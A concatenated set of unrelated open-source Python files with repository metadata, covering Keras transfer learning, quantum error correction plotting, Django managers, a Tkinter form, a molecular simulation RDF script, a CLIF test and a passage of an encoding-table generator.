from tensorflow.keras.models import Sequential
from tensorflow.keras.callbacks import EarlyStopping, ReduceLROnPlateau, ModelCheckpoint
#1. DATA
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
x_train = x_train.reshape(x_train.shape[0], x_train.shape[1], x_train.shape[2], x_train.shape[3])/255.
x_test = x_test.reshape(x_test.shape[0], x_test.shape[1], x_test.shape[2], x_test.shape[3])/255.
y_train = to_categorical(y_train)
y_test = to_categorical(y_test)
print(x_train.shape, y_train.shape)
print(x_test.shape, y_test.shape)
# (50000, 32, 32, 3) (50000, 10)
# (10000, 32, 32, 3) (10000, 10)
#2. Modeling
rn50 = ResNet50(weights='imagenet', include_top=False, input_shape=(32,32,3))
rn50.trainable = False
model = Sequential()
model.add(rn50)
model.add(Flatten())
model.add(Dense(512, activation='relu'))
model.add(Dense(32, activation='relu'))
model.add(Dense(10, activation='softmax'))
# model.summary()
#3. Compile, Train
lr = ReduceLROnPlateau(monitor='val_loss', factor=0.4, patience=10, verbose=1, mode='min')
es = EarlyStopping(monitor='val_loss', patience=20, mode='min')
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc'])
model.fit(x_train, y_train, epochs=100, batch_size=32, validation_split=0.2, verbose=1, callbacks=[lr, es])
loss, acc = model.evaluate(x_test, y_test, batch_size=32)
print("loss : ", loss)
print("acc : ", acc)
## CNN
# loss : 1.7849451303482056
# acc : 0.5971999764442444
###### 전이학습 ######
# VGG16
# loss : 1.9435967206954956
# acc : 0.604200005531311
# VGG19
# loss : 1.9104373455047607
# acc : 0.5917999744415283
# Xception
# ValueError: Input size must be at least 71x71; got `input_shape=(32, 32, 3)`
# >> UpSampling2D & input_shape = (96, 96,3)으로 바꿔줌
# loss : 2.4691503047943115
# acc : 0.7441999912261963
# ResNet50
# loss : 2.302600860595703
# acc : 0.10000000149011612 | [
"[email protected]"
] | |
47cf1a099f9594ba41114c905f4b027f41b1fb7a | 930a868ae9bbf85df151b3f54d04df3a56bcb840 | /benchmark/paper_weighted_union_find_on_XZZX/debug_code_capacity_noise_model/plot_weight_change/weight_change_neighbor.py | 2eb2c091cdab7939f2048f5ca5ca59293dfc50aa | [
"MIT"
] | permissive | yuewuo/QEC-Playground | 1148f3c5f4035c069986d8b4103acf7f1e34f9d4 | 462208458cdf9dc8a33d4553a560f8a16c00e559 | refs/heads/main | 2023-08-10T13:05:36.617858 | 2023-07-22T23:48:49 | 2023-07-22T23:48:49 | 312,809,760 | 16 | 1 | MIT | 2023-07-22T23:48:51 | 2020-11-14T12:10:38 | Python | UTF-8 | Python | false | false | 3,171 | py | import os, sys
import subprocess, sys
qec_playground_root_dir = subprocess.run("git rev-parse --show-toplevel", cwd=os.path.dirname(os.path.abspath(__file__)), shell=True, check=True, capture_output=True).stdout.decode(sys.stdout.encoding).strip(" \r\n")
rust_dir = os.path.join(qec_playground_root_dir, "backend", "rust")
fault_toleran_MWPM_dir = os.path.join(qec_playground_root_dir, "benchmark", "fault_tolerant_MWPM")
sys.path.insert(0, fault_toleran_MWPM_dir)
from automated_threshold_evaluation import qec_playground_fault_tolerant_MWPM_simulator_runner_vec_command
from automated_threshold_evaluation import run_qec_playground_command_get_stdout, compile_code_if_necessary
import numpy as np
import matplotlib.pyplot as plt
di = 11
p = 0.07
divide = 10
bias_eta_vec = [str(0.5 * (10 ** (i / divide))) for i in range(4 * divide)]
# print(bias_eta_vec)
parameters = f"-p1 --time_budget 3600 --use_xzzx_code --shallow_error_on_bottom --debug_print_only --debug_print_direct_connections".split(" ")
# only plot one node because otherwise it's too mesy
interested_node = "[12][10][9]" # in the middle
# interested_node = "[12][20][19]" # on the boundary
results = []
for bias_eta in bias_eta_vec:
command = qec_playground_fault_tolerant_MWPM_simulator_runner_vec_command([p], [di], [di], [0], parameters + ["--bias_eta", f"{bias_eta}"])
# run experiment
stdout, returncode = run_qec_playground_command_get_stdout(command, use_tmp_out=True)
# print("\n" + stdout)
assert returncode == 0, "command fails..."
boundary = None
edges = []
is_interested = False
for line in stdout.strip(" \r\n").split("\n"):
if line[0] == "[":
addr = line.split(":")[0]
is_interested = (addr == interested_node)
elif is_interested:
head, value = line.split(": ")
if head == "boundary":
if value[:4] == "p = ":
boundary = float(value[4:])
if head[:5] == "edge ":
assert value[:4] == "p = "
t,i,j = [int(e) for e in head[5:][1:-1].split("][")]
edges.append(((t,i,j), float(value[4:])))
results.append((boundary, edges))
print(bias_eta, boundary, edges)
fig = plt.figure(f"weight change")
fig.clear()
ax0 = fig.add_subplot(111)
plt.xscale("log")
plt.yscale("log")
ax0.set_title(f"direct neighbors of {interested_node}")
ax0.set_xlabel("bias eta")
ax0.set_xticks([0.5, 5, 50, 500, 5000])
ax0.set_xticklabels([0.5, 5, 50, 500, 5000])
ax0.set_ylabel("probability")
float_bias_eta_vec = [float(e) for e in bias_eta_vec]
if results[0][0] is not None:
boundaries = [results[i][0] for i in range(len(results))]
ax0.plot(float_bias_eta_vec, boundaries, label="boundary")
for ni in range(len(results[0][1])):
addr = results[0][1][ni][0]
for i in range(len(results)):
if addr != results[i][1][ni][0]:
print(addr, results[i][1][ni][0])
assert addr == results[i][1][ni][0]
values = [results[i][1][ni][1] for i in range(len(results))]
ax0.plot(float_bias_eta_vec, values, label=f"[{addr[0]}][{addr[1]}][{addr[2]}]")
ax0.legend()
plt.show()
| [
"[email protected]"
] | |
c023c176ead2dccd07efeef6792dfdb196aae49c | 0eb6c70503c680ebec415016ff1b0cfac92486ca | /lincdm/blog/managers.py | 4467fa3b95367eb9e9040e51170ef10107db77b1 | [] | no_license | alexliyu/lincdm | c8b473946f59aca9145b3291890635474f144583 | eab93285f0b03217ea041a7910edae7e00095cd8 | refs/heads/master | 2020-12-30T10:50:05.248988 | 2011-08-09T15:52:38 | 2011-08-09T15:52:38 | 1,464,255 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,684 | py | """Managers of blog"""
from datetime import datetime
from django.db import models
from django.contrib.sites.models import Site
DRAFT = 0
HIDDEN = 1
PUBLISHED = 2
def tags_published():
    """Return the published tags"""
    # Imported lazily to avoid a circular import between blog.models and
    # this managers module.
    from tagging.models import Tag
    from lincdm.blog.models import Entry
    tags_entry_published = Tag.objects.usage_for_queryset(
        Entry.published.all())
    # Need to do that until the issue #44 of django-tagging is fixed
    return Tag.objects.filter(name__in=[t.name for t in tags_entry_published])
class AuthorPublishedManager(models.Manager):
    """Manager to retrieve published authors"""

    def get_query_set(self):
        """Return published authors"""
        # An author is "published" if they have at least one entry that is
        # published, currently within its publication window, and attached
        # to the current site; distinct() collapses duplicates caused by
        # multiple matching entries.
        now = datetime.now()
        return super(AuthorPublishedManager, self).get_query_set().filter(
            entries__status=PUBLISHED,
            entries__start_publication__lte=now,
            entries__end_publication__gt=now,
            entries__sites=Site.objects.get_current()
            ).distinct()
def entries_published(queryset):
    """Return only the entries published"""
    # Published = PUBLISHED status, inside the publication window, and
    # attached to the current site.
    now = datetime.now()
    return queryset.filter(status=PUBLISHED,
                           start_publication__lte=now,
                           end_publication__gt=now,
                           sites=Site.objects.get_current())
class EntryPublishedManager(models.Manager):
    """Manager to retrieve published entries"""

    def get_query_set(self):
        """Return published entries"""
        return entries_published(
            super(EntryPublishedManager, self).get_query_set())

    def on_site(self):
        """Return entries published on current site"""
        return super(EntryPublishedManager, self).get_query_set(
            ).filter(sites=Site.objects.get_current())

    def search(self, pattern):
        """Top level search method on entries"""
        try:
            return self.advanced_search(pattern)
        except Exception:
            # Fall back to the naive LIKE-based search when the advanced
            # search backend is unavailable or cannot parse the pattern.
            # (Narrowed from a bare `except:` so KeyboardInterrupt and
            # SystemExit still propagate.)
            return self.basic_search(pattern)

    def advanced_search(self, pattern):
        """Advanced search on entries"""
        from lincdm.blog.search import advanced_search
        return advanced_search(pattern)

    def basic_search(self, pattern):
        """Basic search on entries: OR together icontains lookups on
        content, excerpt and title for every whitespace-separated term."""
        lookup = None
        # Note: the original shadowed `pattern` with the loop variable.
        for term in pattern.split():
            query_part = models.Q(content__icontains=term) | \
                         models.Q(excerpt__icontains=term) | \
                         models.Q(title__icontains=term)
            lookup = query_part if lookup is None else lookup | query_part
        if lookup is None:
            # An empty/whitespace pattern used to crash on filter(None);
            # return an empty queryset instead.
            return self.get_query_set().none()
        return self.get_query_set().filter(lookup)
| [
"[email protected]"
] | |
523050cba42f58cd7ac14e6992ad3f7708a17e55 | ba2ad1187e447dc948e32ff1629935d2f05b7d59 | /New folder/08 Accepting User Input In Tkinter Form.py | 2bdfa914adfd1ad27b6475cf0c318faf44ff9aea | [] | no_license | kkgarai/Tkinter | 14fce2e0bbbe013a439f0f7fff8a3e88d3a5370e | 4ce77c22b1229484cdae5f8926011ca32fe0d9ba | refs/heads/master | 2023-02-27T11:10:51.678239 | 2021-02-02T21:08:38 | 2021-02-02T21:08:38 | 295,819,467 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,989 | py | from tkinter import *
root = Tk()
def getvals():
    # Submit handler: echo the current form values and append them as one
    # tuple-formatted line per submission to records.txt.
    print("Submitting form")
    print(
        f"{namevalue.get(), phonevalue.get(), gendervalue.get(), emergencyvalue.get(), paymentmodevalue.get(), foodservicevalue.get()} ")
    with open("records.txt", "a") as f:
        f.write(
            f"{namevalue.get(), phonevalue.get(), gendervalue.get(), emergencyvalue.get(), paymentmodevalue.get(), foodservicevalue.get()}\n")
root.geometry("644x344")
# Heading
Label(root, text="Welcome to Harry Travels", font="comicsansms 13 bold",
pady=15).grid(row=0, column=3)
# Text for our form
name = Label(root, text="Name")
phone = Label(root, text="Phone")
gender = Label(root, text="Gender")
emergency = Label(root, text="Emergency Contact")
paymentmode = Label(root, text="Payment Mode")
# Pack text for our form
name.grid(row=1, column=2)
phone.grid(row=2, column=2)
gender.grid(row=3, column=2)
emergency.grid(row=4, column=2)
paymentmode.grid(row=5, column=2)
# Tkinter variable for storing entries
namevalue = StringVar()
phonevalue = StringVar()
gendervalue = StringVar()
emergencyvalue = StringVar()
paymentmodevalue = StringVar()
foodservicevalue = IntVar()
# Entries for our form
nameentry = Entry(root, textvariable=namevalue)
phoneentry = Entry(root, textvariable=phonevalue)
genderentry = Entry(root, textvariable=gendervalue)
emergencyentry = Entry(root, textvariable=emergencyvalue)
paymentmodeentry = Entry(root, textvariable=paymentmodevalue)
# Packing the Entries
nameentry.grid(row=1, column=3)
phoneentry.grid(row=2, column=3)
genderentry.grid(row=3, column=3)
emergencyentry.grid(row=4, column=3)
paymentmodeentry.grid(row=5, column=3)
# Checkbox & Packing it
foodservice = Checkbutton(text="Want to prebook your meals?",
variable=foodservicevalue)
foodservice.grid(row=6, column=3)
# Button & packing it and assigning it a command
Button(text="Submit to Harry Travels", command=getvals).grid(row=7, column=3)
root.mainloop()
| [
"[email protected]"
] | |
582c4ad65e1b6f2bff267c7119594dd2d2af4f26 | 30d360f965253167c99f9b4cd41001491aed08af | /PTFE_code/Old/rdf_ptfe.py | 12cde9224cf10d6a131600e280ca7a988aaaa356 | [] | no_license | petervanya/PhDcode | d2d9f7170f201d6175fec9c3d4094617a5427fb5 | 891e6812a2699025d26b901c95d0c46a706b0c96 | refs/heads/master | 2020-05-22T06:43:47.293134 | 2018-01-29T12:59:42 | 2018-01-29T12:59:42 | 64,495,043 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,431 | py | #!/usr/bin/env python
"""Usage:
rdf_ptfe.py (--bead <b> | water) <fnames>
[--L <L> --bins <nbins> --binalg <b>]
Read xyz files and compute radial distribution function
for any DPD beads or water beads (water is in both beads C and W):
* C: 3 molecules (SO3+3H2O, bead 3)
* W: 6 molecules (bead 4)
Arguments:
--beadtype <b> Number from 1 to num. bead types, typically 4
<fnames> Regex for all the xyz files to read
Options:
--bins <nbins> Number of bins
--binalg <b> 'numpy' or 'fortran' [Default: fortran]
--L <L> Box size [default: 40.0]
[email protected], 09/01/16
"""
import numpy as np
from math import *
import glob, sys
from docopt import docopt
import lmp_lib as ll
from Fcore.f_rdf import f_rdf # Fortran module
def set_num_bins(N, method="sqrt"):
    """Choose a histogram bin count for N samples.
    Available methods: rice, sturges, sqrt (default)."""
    if method == "rice":
        estimate = 2 * N ** (1. / 3)    # Rice rule
    elif method == "sturges":
        estimate = log(N, 2) + 1        # Sturges' formula
    else:
        estimate = sqrt(N)              # most primitive
    return int(estimate) + 1
def read_outfile(outfile):
    """Load one xyz outfile (2-line header skipped) into a float matrix."""
    with open(outfile, "r") as f:
        rows = [line.split() for line in f.readlines()[2:]]
    return np.array(rows, order="F").astype(float)
def save_data(outfile, *args):
    """Save equal-length vectors as tab-separated columns into outfile.

    Row i of the output holds args[0][i] ... args[m-1][i], each value
    followed by a tab (the trailing tab before the newline is kept for
    backward compatibility with existing readers).
    """
    # list() is required on Python 3: zip() returns a one-shot iterator,
    # and the original code indexed into it (args[i][j]) -> TypeError.
    rows = list(zip(*args))
    with open(outfile, "w") as f:
        for row in rows:
            line = ""
            for value in row:
                line += str(value) + "\t"
            f.write(line + "\n")
def compute_rdf_water_np(outfile, L, nbins=30):
    """Compute the water radial distribution function for one xyz frame,
    using the Fortran routine for pair distances and numpy for binning.

    Water lives in beads C (type 3, 3 molecules/bead) and W (type 4,
    6 molecules/bead); the raw histograms are weighted accordingly.
    """
    A = read_outfile(outfile)
    xyz_C = A[A[:, 0] == 3][:, 1:]
    xyz_W = A[A[:, 0] == 4][:, 1:]
    # np.eye takes an int size; np.eye((3, 3)) raises TypeError.
    cell = L * np.eye(3)

    d_C = f_rdf.dist_vec(xyz_C, cell) # rdf for beads C
    # print " Distance matrix for C beads done."
    rdf_raw_C, r = np.histogram(d_C, nbins)
    # print " Binning for C beads done."
    del d_C    # free the O(N^2) distance array before the next one

    d_W = f_rdf.dist_vec(xyz_W, cell) # rdf for beads W
    # print " Distance matrix for W beads done."
    rdf_raw_W, r = np.histogram(d_W, nbins)
    # print " Binning for W beads done."
    del d_W

    d_CW = f_rdf.dist_vec_2mat(xyz_C, xyz_W, cell) # rdf for combined beads C and W
    # print " Distance matrix for CW beads done."
    rdf_raw_CW, r = np.histogram(d_CW, nbins)
    # print " Binning for CW beads done."
    del d_CW

    # Weight by molecules-per-bead: 3^2 for C-C, 6^2 for W-W, 3*6 for C-W.
    rdf_raw = rdf_raw_C * 3**2 + rdf_raw_W * 6**2 + rdf_raw_CW * 3*6
    # Convert bin edges to centres and normalise by the shell volume.
    r = r[:-1] + np.diff(r)/2.0
    dr = r[1] - r[0]
    rdf = rdf_raw/(4*pi*r**2 * dr)
    return r, rdf
def compute_rdf_water(outfile, L, nbins=30):
    """Compute the water radial distribution function for one xyz frame,
    using the Fortran routine for both pair distances and binning."""
    A = read_outfile(outfile)
    xyz_C = A[A[:, 0] == 3][:, 1:]
    xyz_W = A[A[:, 0] == 4][:, 1:]
    # np.eye takes an int size; np.eye((3, 3)) raises TypeError.
    cell = L * np.eye(3)

    rdf_raw_C, r = f_rdf.pair_dist_hist(xyz_C, nbins, cell)
    # print " Bead C pair dist and binning beads done"
    rdf_raw_W, r = f_rdf.pair_dist_hist(xyz_W, nbins, cell)
    # print " Bead W pair dist and binning beads done"
    rdf_raw_CW, r = f_rdf.pair_dist_hist2(xyz_C, xyz_W, nbins, cell)
    # print " Beads C and W pair dist and binning beads done"

    # Weight by molecules-per-bead: 3^2 for C-C, 6^2 for W-W, 3*6 for C-W.
    rdf_raw = rdf_raw_C * 3**2 + rdf_raw_W * 6**2 + rdf_raw_CW * 3*6
    # Convert bin edges to centres and normalise by the shell volume.
    r = r[:-1] + np.diff(r)/2.0
    dr = r[1] - r[0]
    rdf = rdf_raw/(4*pi*r**2 * dr)
    return r, rdf
def master_rdf_water(outfiles, L, nbins=30, method="fortran"):
    """Construct an rdf for water beads
    from all the available xyz files.

    method selects the binning backend: "fortran" (pair distances and
    binning in Fortran) or "numpy" (numpy histogramming); any other value
    silently produces no data.
    """
    rdf_mat = []
    if method == "fortran":
        for outfile in outfiles:
            r, rdf_i = compute_rdf_water(outfile, L, nbins)
            rdf_mat.append(rdf_i)
            print(outfile, "done.")
    if method == "numpy":
        for outfile in outfiles:
            r, rdf_i = compute_rdf_water_np(outfile, L, nbins)
            rdf_mat.append(rdf_i)
            print(outfile, "done.")
    # One column per frame; also dumped for later inspection.
    rdf_mat = np.array(rdf_mat).T
    np.savetxt("rdf_mat.out", rdf_mat)
    print("rdf matrix saved in rdf_mat.out")
    # Average over frames.
    rdf = np.array(np.sum(rdf_mat, 1) / len(outfiles))
    return r, rdf
def compute_rdf(outfile, L, beadtype, nbins=30):
    """Compute the RDF of one bead type from one xyz frame, using the
    Fortran routine for pair distances and binning."""
    A = read_outfile(outfile)
    # np.eye takes an int size; np.eye((3, 3)) raises TypeError.
    cell = L * np.eye(3)
    xyz = A[A[:, 0] == beadtype][:, 1:]
    rdf_raw, r = f_rdf.pair_dist_hist(xyz, nbins, cell) # key routine
    # Convert bin edges to centres and normalise by the shell volume.
    r = r[:-1] + np.diff(r)/2.0
    dr = r[1] - r[0]
    rdf = rdf_raw/(4*pi*r**2 * dr)
    return r, rdf
def master_rdf(outfiles, L, beadtype, nbins=30):
    """Construct an rdf for given bead type
    from all the available xyz files."""
    rdf_mat = []
    for outfile in outfiles:
        r, rdf_i = compute_rdf(outfile, L, beadtype, nbins)
        rdf_mat.append(rdf_i)
        print(outfile, "done.")
    # One column per frame; also dumped for later inspection.
    rdf_mat = np.array(rdf_mat).T
    np.savetxt("rdf_mat.out", rdf_mat)
    print("rdf matrix saved in rdf_mat.out")
    # Average over frames.
    rdf = np.array(np.sum(rdf_mat, 1) / len(outfiles))
    return r, rdf
if __name__ == "__main__":
args = docopt(__doc__)
outfiles = glob.glob(args["<fnames>"])
beadtype = "water" if args["water"] else args["<b>"]
if len(outfiles) == 0:
raise ValueError("No xyz files captured, aborting.")
print(outfiles)
Nfiles = len(outfiles)
N = int(open(outfiles[0], "r").readline())
L = float(args["--L"])
if args["--bins"]:
Nbins = int(args["--bins"])
else:
Nbins = set_num_bins(N, method="sturges")
method = args["--binalg"]
A = ll.read_xyzfile(outfiles[0])
Nbt = len(set(A[:, 0]))
Nb = len(A[A[:, 0] == int(beadtype)])
print("Total beads: %i | Num. beadtypes: %i | Bins: %i" % (N, Nbt, Nbins))
print("Bead type: %s | Beads of this type: %i" % (beadtype, Nb))
if beadtype == "water":
r, vals = master_rdf_water(outfiles, L, Nbins, method)
fname = "rdf_water.out"
else:
r, vals = master_rdf(outfiles, L, int(beadtype), Nbins)
fname = "rdf.out"
save_data(fname, r, vals)
print("rdf saved in", fname)
| [
"[email protected]"
] | |
c66bd3c2ab4b0774d6d5247124b5b57b6b452835 | b2716c78a38fcc0acee852c3e33bf110fa35f4f6 | /Rem_pro/yes_no_app/migrations/0001_initial.py | adac69f943774781d801b67b55ffe04899f1a85d | [] | no_license | RajeshKumar-1998/Reminder-App | f381e8728af5694d5e0e627ed261886a20b45318 | 985a1ee548b8a5b1a9970a9421cac4c98d6fc3b4 | refs/heads/master | 2022-11-07T00:27:30.348065 | 2020-06-19T11:28:35 | 2020-06-19T11:28:35 | 259,647,627 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 554 | py | # Generated by Django 2.2.7 on 2019-12-03 23:54
from django.db import migrations, models
# Auto-generated by Django makemigrations; edit with care.
class Migration(migrations.Migration):
    # First migration of the app: creates the Todorem table.
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Todorem',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('list', models.CharField(max_length=200)),
                ('completes', models.BooleanField(default=False)),
            ],
        ),
    ]
| [
"[email protected]"
] | |
bae8017147a594e2103ce78cf22b3560ebbb921d | 68c37d6a87113fb992126e9806a78896d1727c43 | /examples/wrap_protos/python/wrap_protos_test.py | dd8e3e8c73c9fec00c9ebd62bbdad2337b427a09 | [
"Apache-2.0"
] | permissive | Pandinosaurus/clif | 1b8be31a0b1b45b11d93fe2d7b3f359f69d9075f | 87eed3999dba9f8d160c6b735e1803640d019289 | refs/heads/master | 2021-04-09T13:53:23.744431 | 2020-09-11T01:53:03 | 2020-09-11T01:53:03 | 125,673,546 | 1 | 0 | Apache-2.0 | 2020-09-11T04:35:26 | 2018-03-17T22:20:42 | C++ | UTF-8 | Python | false | false | 2,310 | py | # Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for clif.examples.wrap_protos.python.wrap_protos."""
import unittest
import wrap_protos
import sample_pb2
class WrapProtosTest(unittest.TestCase):
  """Exercises the CLIF-wrapped proto APIs exposed by `wrap_protos`."""

  def testProtos(self):
    s = sample_pb2.MyMessage()
    # Even though DefaultInitSample on the C++ side takes a pointer to the
    # proto, |s| is serialized and deserialized in to a copy of the C++ proto.
    # Hence, changes made to the proto on the C++ side do not reflect in Python.
    wrap_protos.DefaultInitMyMessage(s)
    self.assertNotEqual(s.name, 'default')
    # |s| is a normal Python proto with all its normal Python proto API.
    s.name = 'my_python_name'
    s.msg.id.append(123)
    s.msg.id.append(345)
    self.assertEqual(len(s.msg.id), 2)
    pman = wrap_protos.ProtoManager()
    # The GetSample method returns a copy of the proto even though the C++
    # method returns a pointer. The C++ proto is serialized and then
    # deserialized into a Python proto.
    s = pman.GetMyMessage()
    self.assertEqual(s.name, 'default')
    # Changing the proto in Python does not have any effect on the C++ side.
    s.name = 'new_name'
    s = pman.GetMyMessage()
    self.assertEqual(s.name, 'default')
    # Create instances of nested proto messages using the '.' notation as usual.
    nested = sample_pb2.MyMessage.Nested()
    nested.value = sample_pb2.MyMessage.Nested.DEFAULT
    # And pass them to a wrapped functions as usual.
    msg = wrap_protos.MakeMyMessageFromNested(nested)
    # assertEquals is a deprecated alias; use assertEqual.
    self.assertEqual(msg.name, 'from_nested')
    enum_val = sample_pb2.MyMessage.Nested.EXPLICIT
    msg = wrap_protos.MakeMyMessageFromNestedEnum(enum_val)
    self.assertEqual(msg.name, 'from_nested_enum')
self.assertEquals(msg.name, 'from_nested_enum')
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
b944c87d448e9067ff47da684933ca3c2636ec8c | 297497957c531d81ba286bc91253fbbb78b4d8be | /third_party/rust/encoding_rs/generate-encoding-data.py | 4dfb5adc686b716ece27c03e8d980a78de605f17 | [
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"CC0-1.0",
"LicenseRef-scancode-public-domain",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | marco-c/gecko-dev-comments-removed | 7a9dd34045b07e6b22f0c636c0a836b9e639f9d3 | 61942784fb157763e65608e5a29b3729b0aa66fa | refs/heads/master | 2023-08-09T18:55:25.895853 | 2023-08-01T00:40:39 | 2023-08-01T00:40:39 | 211,297,481 | 0 | 0 | NOASSERTION | 2019-09-29T01:27:49 | 2019-09-27T10:44:24 | C++ | UTF-8 | Python | false | false | 57,123 | py |
import json
import subprocess
import sys
import os.path
if (not os.path.isfile("../encoding/encodings.json")) or (not os.path.isfile("../encoding/indexes.json")):
sys.stderr.write("This script needs a clone of https://github.com/whatwg/encoding/ (preferably at revision f381389) next to the encoding_rs directory.\n");
sys.exit(-1)
if not os.path.isfile("../encoding_c/src/lib.rs"):
sys.stderr.write("This script also writes the generated parts of the encoding_c crate and needs a clone of https://github.com/hsivonen/encoding_c next to the encoding_rs directory.\n");
sys.exit(-1)
if not os.path.isfile("../codepage/src/lib.rs"):
sys.stderr.write("This script also writes the generated parts of the codepage crate and needs a clone of https://github.com/hsivonen/codepage next to the encoding_rs directory.\n");
sys.exit(-1)
def cmp_from_end(one, other):
    """Three-way compare two sequences: shortest first, then back-to-front.

    A shorter sequence always sorts before a longer one; equal-length
    sequences are ordered by their last differing element.  Returns
    -1, 0 or 1 like Python 2's ``cmp``.

    The original implementation called the ``cmp`` builtin, which only
    exists in Python 2; this version has identical semantics but does not
    depend on it.
    """
    # Length decides first.
    if len(one) != len(other):
        return -1 if len(one) < len(other) else 1
    # Same length: scan from the last element towards the first.
    for i in reversed(range(len(one))):
        if one[i] != other[i]:
            return -1 if one[i] < other[i] else 1
    return 0
class Label:
    """An encoding label paired with the preferred encoding name it resolves to."""
    def __init__(self, label, preferred):
        self.label = label
        self.preferred = preferred
    def __cmp__(self, other):
        # Python 2 comparison hook: Labels sort by their label strings,
        # shortest first, comparing characters from the end (cmp_from_end).
        return cmp_from_end(self.label, other.label)
class CodePage:
    """A Windows code page number paired with its preferred encoding name."""
    def __init__(self, code_page, preferred):
        self.code_page = code_page
        self.preferred = preferred
    def __cmp__(self, other):
        # Bug fix: the original returned the *tuple*
        # `self.code_page, other.code_page`, which is not a valid __cmp__
        # result (Python 2 requires a negative/zero/positive int), so any
        # attempt to sort CodePage instances would fail.  Return a proper
        # three-way comparison by code page number instead.
        if self.code_page < other.code_page:
            return -1
        if self.code_page > other.code_page:
            return 1
        return 0
def static_u16_table(name, data):
    """Emit a `pub static` Rust array of u16 hex literals called `name`.

    Writes into the module-global `data_file`; `data` is a sequence of
    integers, one per array element.
    """
    data_file.write('''pub static %s: [u16; %d] = [
''' % (name, len(data)))
    # One element per line, zero-padded to four hex digits.
    for value in data:
        data_file.write('0x%04X,\n' % value)
    data_file.write('''];
''')
def static_u16_table_from_indexable(name, data, item, feature):
    """Emit a feature-gated Rust u16 array from element `item` of each entry.

    The array is compiled only when the "less-slow-<feature>" cargo feature
    is on and the "fast-<feature>" one is off.  Writes to the module-global
    `data_file`.
    """
    data_file.write('''#[cfg(all(
feature = "less-slow-%s",
not(feature = "fast-%s")
))]
static %s: [u16; %d] = [
''' % (feature, feature, name, len(data)))
    for entry in data:
        data_file.write('0x%04X,\n' % entry[item])
    data_file.write('''];
''')
def static_u8_pair_table_from_indexable(name, data, item, feature):
    """Emit a feature-gated Rust [[u8; 2]; N] array from element `item` of each entry.

    Each `data[i][item]` must be a pair of bytes.  Gated the same way as
    static_u16_table_from_indexable; writes to the module-global `data_file`.
    """
    data_file.write('''#[cfg(all(
feature = "less-slow-%s",
not(feature = "fast-%s")
))]
static %s: [[u8; 2]; %d] = [
''' % (feature, feature, name, len(data)))
    for entry in data:
        data_file.write('[0x%02X, 0x%02X],\n' % entry[item])
    data_file.write('''];
''')
def static_u8_pair_table(name, data, feature):
    """Emit a cargo-feature-gated Rust [[u8; 2]; N] array named `name`.

    Entries of `data` are byte pairs; a falsy entry (None) marks an
    unmapped slot and is emitted as [0x00, 0x00].  Writes to the
    module-global `data_file`.
    """
    data_file.write('''#[cfg(feature = "%s")]
static %s: [[u8; 2]; %d] = [
''' % (feature, name, len(data)))
    for pair in data:
        data_file.write('[0x%02X, 0x%02X],\n' % (pair if pair else (0, 0)))
    data_file.write('''];
''')
# Accumulators filled while walking encodings.json: canonical encoding
# names, DOM-facing names, and (label, preferred-name) pairs.
preferred = []
dom = []
labels = []
# The WHATWG data files: encoding groups with their labels, and the
# byte-to-code-point mapping indexes.
data = json.load(open("../encoding/encodings.json", "r"))
indexes = json.load(open("../encoding/indexes.json", "r"))
single_byte = []
multi_byte = []
def to_camel_name(name):
    """Convert a WHATWG encoding name to the CamelCase identifier used in Rust."""
    # ISO-8859-8-I gets a hand-picked identifier; the other ISO-8859
    # variants keep their numeric suffix after an "Iso" prefix.
    if name == u"iso-8859-8-i":
        return u"Iso8I"
    if name.startswith(u"iso-8859-"):
        return name.replace(u"iso-8859-", u"Iso")
    # Title-case the name, then strip the "X-" prefix and any separators.
    camel = name.title()
    for unwanted in (u"X-", u"-", u"_"):
        camel = camel.replace(unwanted, u"")
    return camel
def to_constant_name(name):
    """Convert an encoding name to the UPPER_SNAKE_CASE Rust constant name."""
    return name.upper().replace(u"-", u"_")
def to_snake_name(name):
    """Convert an encoding name to the lower_snake_case Rust field/module name."""
    return name.lower().replace(u"-", u"_")
def to_dom_name(name):
    """Return the DOM-facing spelling of the name (currently the identity)."""
    return name
encodings_by_code_page_frequency = [
"UTF-8",
"UTF-16LE",
"windows-1252",
"windows-1251",
"GBK",
"Shift_JIS",
"EUC-KR",
"windows-1250",
"windows-1256",
"windows-1254",
"Big5",
"windows-874",
"windows-1255",
"windows-1253",
"windows-1257",
"windows-1258",
"EUC-JP",
"ISO-8859-2",
"ISO-8859-15",
"ISO-8859-7",
"KOI8-R",
"gb18030",
"ISO-8859-5",
"ISO-8859-8-I",
"ISO-8859-4",
"ISO-8859-6",
"ISO-2022-JP",
"KOI8-U",
"ISO-8859-13",
"ISO-8859-3",
"UTF-16BE",
"IBM866",
"ISO-8859-10",
"ISO-8859-8",
"macintosh",
"x-mac-cyrillic",
"ISO-8859-14",
"ISO-8859-16",
]
encodings_by_code_page = {
932: "Shift_JIS",
936: "GBK",
949: "EUC-KR",
950: "Big5",
866: "IBM866",
874: "windows-874",
1200: "UTF-16LE",
1201: "UTF-16BE",
1250: "windows-1250",
1251: "windows-1251",
1252: "windows-1252",
1253: "windows-1253",
1254: "windows-1254",
1255: "windows-1255",
1256: "windows-1256",
1257: "windows-1257",
1258: "windows-1258",
10000: "macintosh",
10017: "x-mac-cyrillic",
20866: "KOI8-R",
20932: "EUC-JP",
21866: "KOI8-U",
28592: "ISO-8859-2",
28593: "ISO-8859-3",
28594: "ISO-8859-4",
28595: "ISO-8859-5",
28596: "ISO-8859-6",
28597: "ISO-8859-7",
28598: "ISO-8859-8",
28600: "ISO-8859-10",
28603: "ISO-8859-13",
